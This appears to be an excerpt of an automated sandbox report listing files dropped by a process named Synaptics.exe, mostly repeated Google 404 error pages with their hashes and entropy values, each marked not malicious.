                                                                                                                                        Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.267658529415085
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0CSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
                                                                                                                                        MD5:0567AFB0CBD3DFEC9BF3AD4F86F38540
                                                                                                                                        SHA1:1FCC55C7430FC317BEAA4E9C862178D7D040C754
                                                                                                                                        SHA-256:A8EA8B1EC97B9EDA4DC1DAD01CDA383C3E52A8C49086044B29D59A1056292315
                                                                                                                                        SHA-512:F001AFDD256E60CA0746726498B9D59CE26668AE0A8D6818F2D35F2B115DC69D3D91FC5CAE6F1077700F8B55D190C7337260CA5CF1EE2B78308EE26ABF44CC4E
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="X5F-bW8nYs9O3LNeN9iXUA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.2774866955088005
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+05SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+e+pAZewRDK4mW
                                                                                                                                        MD5:8F009E1105568DD38A261BDF53B4357D
                                                                                                                                        SHA1:BF2690F2BBC3894EED7576B4734A3FF7AA323290
                                                                                                                                        SHA-256:F7E72E77AA8D222D9E2687791C904EE5942F2B7D19A4010258396B12934D0C43
                                                                                                                                        SHA-512:CFFC15528FB24A449A3BD6BA5D455C652A2874DB5F3F348F21B53BE091523736A5B5AA9454A3ED9CE6B0A1B805B99A61D88954EF815990BDE2905AED8E283DBD
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="jHYPpUPn8Fv0mTVBvPOUzA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.276423674738625
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0LOSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+WO+pAZewRDK4mW
                                                                                                                                        MD5:D557463B396A8D1C1FC4DCFAD8671C38
                                                                                                                                        SHA1:F5BEA6290170F062D0E1CC8C45CDCACD17922729
                                                                                                                                        SHA-256:7C3619AC0916AB542EF3C024BAFB804E33EAE52293E34A2BE22B2B029054F365
                                                                                                                                        SHA-512:1AF9F4D6CF8BB427ED766A0BA5304743C3243C1641BD724BF0BAF2BF11075DB6661E46FCF594B8613F34E6F45BDF7ABFC366158AA2D07558E7F3D598A5AB3B16
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MvYQcDoq6FougXH6AShTWA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.252496722206854
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0JkSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ik+pAZewRDK4mW
                                                                                                                                        MD5:1B5637E7D5BD1971AE776052F76F4F1F
                                                                                                                                        SHA1:ABC38A5CBCB0D63C7060BEB9E85328ABCCCF1636
                                                                                                                                        SHA-256:9EE4389EAA93AF245508ACC4BB5C7FADD7E0506664488FF392376812158C7F71
                                                                                                                                        SHA-512:B6AB4D153D8A96AC8AFFBE263F0EDB10E831A963B05383309BF54D58DDECAE8F04390AA18ECBEACECF5AD3731EFFFE43713E38865C4562680C6EB80C76CD1B66
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0tzS3pZc_yhikAnAfdoYcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.252688268176776
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+06RSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+V+pAZewRDK4mW
                                                                                                                                        MD5:CDF42632E6A8CAA57495F0E6B4786619
                                                                                                                                        SHA1:9DBF11D38E14419C8A0B82CF07A17123499142A2
                                                                                                                                        SHA-256:393E94CD4FEE67CE2D309C805D3B117D1E09E50EF4AB11FA830D5A6A4FB51F69
                                                                                                                                        SHA-512:F9FABD593438C729FDA5741A26D5B0C10379DD5A0E7A5C9618BA92EAA5D0DBAFE342E1E50A5ED255D4CFCE6D2D529C4A4D934EFE8C15C05371FA8BC57426EE00
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wYymx8_nhRYA9a4wuAEdsA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.257558055678864
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0nwSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                        MD5:5374A294049863E05120A76AB49C06A9
                                                                                                                                        SHA1:D74B41283312063B5D2D21F25E61D642BFA194EA
                                                                                                                                        SHA-256:D78C5A531284DCCA005A95E41EF242550C5863F58B29E4662219ED0F12035513
                                                                                                                                        SHA-512:8D0B889D3EC510D317C8A80AE98DD1F12F1C2492D56D9FCC5E49BD7EFDC4C0EA2F3DE85A62FEFAD446E7F51F565B96CA3B78111D8F66B409EB5C01E8EA292B82
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DzdvD4yfEB6Xh7atg-jnNg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.264652220295398
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+02RSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7R+pAZewRDK4mW
                                                                                                                                        MD5:6B3DDDC73F37E8ABFCD30D325807464F
                                                                                                                                        SHA1:FD676087BAF1FD03365E4DD73C2B081D8BE2541C
                                                                                                                                        SHA-256:1547A74678F027C9396D335374B70021A124D0D66984839F70B14E6CF68C25A2
                                                                                                                                        SHA-512:D180ABC6D71FA198865022BC7E3FE8E0E662370DA1F55809A41F73E85A7A0050F305D6D27FECDF0B911D84DE4BB106DBE51A04A4B0EFACFC10D2D18AD1D0BAC9
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="K6G_IccnTIv1GNuOKFdA-w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.251693729590694
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0NASU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+MA+pAZewRDK4mW
                                                                                                                                        MD5:EAAEA06B432AB0A9A8CB58C9B74D8C9C
                                                                                                                                        SHA1:94C1BD3D1A544EAA4D2710BC76F9A5A17474D0E9
                                                                                                                                        SHA-256:AB36F0C752FBA4C0D200C8DBFFFA5CA62F219C1A46CAF859051AC898B9426BC0
                                                                                                                                        SHA-512:B27F3D30FDC77D7E4A674CFA60233660563D43E5DD1DA38D4F6E8804FF142C2CE0C162EB41B8FEDB1ACA5C1E7CAD7F381BB9F65E502E6859BE2C2E6171F8C1E7
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ObZamka275bI2TOYdnX7iw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.264317956140634
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                                        MD5:880DBA45655538567694DC1714ECE82E
                                                                                                                                        SHA1:B893FB4AEAAA23833FD6B5EFD459C78E39EA7673
                                                                                                                                        SHA-256:75BF6294DAD91F6B51502871A864ED2AEEA2325FF3519A79A9FD5D0594A25104
                                                                                                                                        SHA-512:DA7F09020F5A52EC7FE54C0187726E9D90A1944756B60967DB0E3849CE7FAB362309730A790673FE21CB0BE292AA5085E9EEF1D6313C832C9B27966560C5E6D0
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="II53zE9vxLgm9ykPmCrxZQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.256654975068276
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+j+pAZewRDK4mW
                                                                                                                                        MD5:5977401506A9A15C86FCB4CE4C9EF11E
                                                                                                                                        SHA1:DC6C62442F605C4304FA9FE598C2ED25B32A4642
                                                                                                                                        SHA-256:E500931E9A6CD8B30640B02712DA92E08699FA9C912F61D4770BA38D24CA3E10
                                                                                                                                        SHA-512:875CE52152DCE307FBB0698B90E35443EC2721A0B449FDABF12C13733E01F03E0047F8BEFC371DB81277AD4F095C32ABDDB770C410227EA6B631E186553D417F
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="k0oUwwdQBr8WNfZ06WrdXg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.258764425859648
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+B+pAZewRDK4mW
                                                                                                                                        MD5:7DF228EFE0C1CC29ED5503B0375FE652
                                                                                                                                        SHA1:F745AC32F76C87C489AD06B9652840423ABF852F
                                                                                                                                        SHA-256:D64695B500EE3B4385778AFE42F9204304953C584F161A44F976BC17DC54CBBC
                                                                                                                                        SHA-512:83DEFA7048B95D528713D945ED1831A0C523438F19E899145892A35D786117D3D17A2C9AE87C216C730C9355A13455DD9E1024DF976A59C88B475BDC5B4B3041
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PWblfiEaXUmnJ-YbSm361w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.246082838031933
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0ujSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D+pAZewRDK4mW
                                                                                                                                        MD5:97A3CDA81F089FFE7693DBEC8453C76C
                                                                                                                                        SHA1:5F8C6BC7AD2949269B5A4F942C6FB06D70F8B0E0
                                                                                                                                        SHA-256:537EF8D4DC783D38C1CFA5B8AE8931387E7127AD13D6BEF6EA84E239451CCBBA
                                                                                                                                        SHA-512:A0AE89A2375B182811E6709D9791D426EEFB6D47361A3D4AC274373D7616F35F60F585A3D93940E385968559763D3D2590CE19AFB46DE476D5E9689E4A98DCCD
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="sMco93jgr-P7l4ob28_mNw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.258110873964843
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0RcSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+ic+pAZewRDK4mW
                                                                                                                                        MD5:9A3F3736F2DE8C304B18831D29655150
                                                                                                                                        SHA1:3BF34AA87E11953AC5921D0B7959132DF03080E1
                                                                                                                                        SHA-256:76F62D02E8560A7EEC7078756E702D8C061441AF6D074290F1068ECD5ADC797E
                                                                                                                                        SHA-512:475D884D98A620AA26DEE5F595CBF54A7E08E1ADF9BB2CCB780FAADB12DF8E372F98FAC77FFD2BE1EF9B1F200C108D8EC1DFA19559402EB0971C2FC5836893C1
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="M5nNpMbAbIg4QKfRxDtoMg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.265182170389645
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+00JSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+TJ+pAZewRDK4mW
                                                                                                                                        MD5:EA772AEC362B26D0165E5E8430053E6B
                                                                                                                                        SHA1:C6546B8DAD80DEE210CE2AAAF8C075AA4FDD54C5
                                                                                                                                        SHA-256:60D4B41D9C0AD3B282CDC3561370D09BE1BF3764FB6043452482511B450B5729
                                                                                                                                        SHA-512:26FAF6C7ED19FFE15177C6028CA567AAFFA244932D8B304D34C77A25AA9DCB8A052001781222CF9E00AB9139E0F7BF5AD4BA1F764AEE00F6A33227D7144F8770
                                                                                                                                        Malicious:false
                                                                                                                                        Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="M8vx5X6FGAdvNfgZGfgzGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                        Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                        File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                        Category:dropped
                                                                                                                                        Size (bytes):1652
                                                                                                                                        Entropy (8bit):5.263335336053193
                                                                                                                                        Encrypted:false
                                                                                                                                        SSDEEP:24:GgsF+0BqSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Mq+pAZewRDK4mW
                                                                                                                                        MD5:679664F809824864D3D27C60EFB8CB67
                                                                                                                                        SHA1:8520A786ED9133700DAD0111334E8613F14E7C6D
                                                                                                                                        SHA-256:BE9233924BA5F8A0089CFC7457FDB62FB4C291B5CAD0C63E270AF97B1FFE2FBC
                                                                                                                                        SHA-512:38B1CBE2B454255688E74079039EC4943C2A73F997F4884B86BD56AAD4572452191E74CA1F92539B0C5C1A78780F0538C4EB4C8F00072FCA9FE1F91D491FE421
                                                                                                                                        Malicious:false
